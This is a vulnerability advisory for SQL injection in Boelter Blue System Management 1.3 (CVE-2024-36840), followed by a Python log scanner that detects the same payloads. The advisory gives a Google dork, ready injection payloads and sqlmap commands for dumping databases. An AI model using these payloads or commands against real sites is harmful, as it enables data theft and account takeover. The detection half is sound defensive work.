# Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)
# Google Dork: inurl:"Powered by Boelter Blue"
# Date: 2024-06-04
# Exploit Author: CBKB (DeadlyData, R4d1x)
# Vendor Homepage: https://www.boelterblue.com
# Software Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_US
# Version: 1.3
# Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
# CVE: CVE-2024-36840

## Vulnerability Details:

### Description:
Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.

Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=10071 AND 4036=4036

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)

Type: UNION query
Title: Generic UNION query (NULL) - 44 columns
Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

1. **news_details.php?id** parameter:
sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs

2. **services.php?section** parameter:
sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs

3. **location_details.php?id** parameter:
sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs

Impact:
Unauthorized access to the database.
Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials.
Account takeovers and potential full control of the affected application.

Discoverer(s)/Credits:
CBKB (DeadlyData, R4d1x)

References:
https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840
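The three payload families listed in the advisory (a boolean tautology, a `SLEEP()` delay, and a `UNION ALL SELECT` with hex-encoded marker strings, the last one optionally run through sqlmap's `space2comment` tamper) all leave recognisable traces in a web server access log. The scanner below is an added example from the defender's side, not part of the advisory or of the Boelter Blue product: it parses combined-format log lines, URL-decodes each query parameter, and reports which indicator fired. The log lines are constructed for the example and reuse the parameter names and payload shapes shown above; the source address and timestamps are invented.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Fields of the Apache combined log format needed here (constructed regex for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# sqlmap's space2comment tamper replaces spaces with /**/, so both count as a separator.
SP = r"(?:\s|/\*\*/)+"

# Each indicator is (name, compiled regex); order determines the order of reported hits.
INDICATORS = [
    ("union_select", re.compile(rf"\bunion\b{SP}(?:all{SP})?select\b", re.I)),
    ("time_based", re.compile(r"\b(?:sleep|benchmark|pg_sleep|waitfor)\s*\(", re.I)),
    ("boolean_tautology", re.compile(rf"\b(?:and|or){SP}(\d+)\s*=\s*\1\b", re.I)),
    ("comment_terminator", re.compile(r"--\s|#|/\*")),
    ("hex_marker", re.compile(r"0x[0-9a-f]{6,}", re.I)),
]


def analyse_value(value):
    """Return the names of every indicator that fires on one decoded parameter value."""
    return [name for name, rx in INDICATORS if rx.search(value)]


def scan_log(lines):
    """Parse access-log lines and return one finding per flagged query parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes values, so the indicators see what the application saw.
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = analyse_value(value)
            if hits:
                findings.append({
                    "ip": m.group("ip"),
                    "path": parts.path,
                    "param": param,
                    "status": int(m.group("status")),
                    "indicators": hits,
                })
    return findings


# Constructed sample log: one benign request followed by the payload shapes from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Jun/2024:10:00:01 +0000] "GET /news_details.php?id=10071 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [04/Jun/2024:10:00:02 +0000] "GET /news_details.php?id=10071%20AND%204036%3D4036 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [04/Jun/2024:10:00:09 +0000] "GET /news_details.php?id=10071%20AND%20(SELECT%204443%20FROM%20(SELECT(SLEEP(5)))LjOd) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [04/Jun/2024:10:00:10 +0000] "GET /news_details.php?id=-5819%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170766b71,0x64665551,0x7162626a71),NULL--%20- HTTP/1.1" 500 311 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [04/Jun/2024:10:00:11 +0000] "GET /services.php?section=5081/**/UNION/**/ALL/**/SELECT/**/NULL,NULL--%20- HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['param']} status={f['status']} {','.join(f['indicators'])}")
```

The first line produces no finding; the other four each produce one, and the `services.php` line is caught even though `space2comment` removed every literal space. The indicators are heuristics: `#` and `/*` can appear in legitimate values, so in production this belongs in a scoring or correlation step (many hits from one source against the same parameter within seconds is the sqlmap signature) rather than a single-hit block. The fix on the application side is unchanged by any of this: the `id` and `section` values must be bound as parameters of a prepared statement, never concatenated into the query.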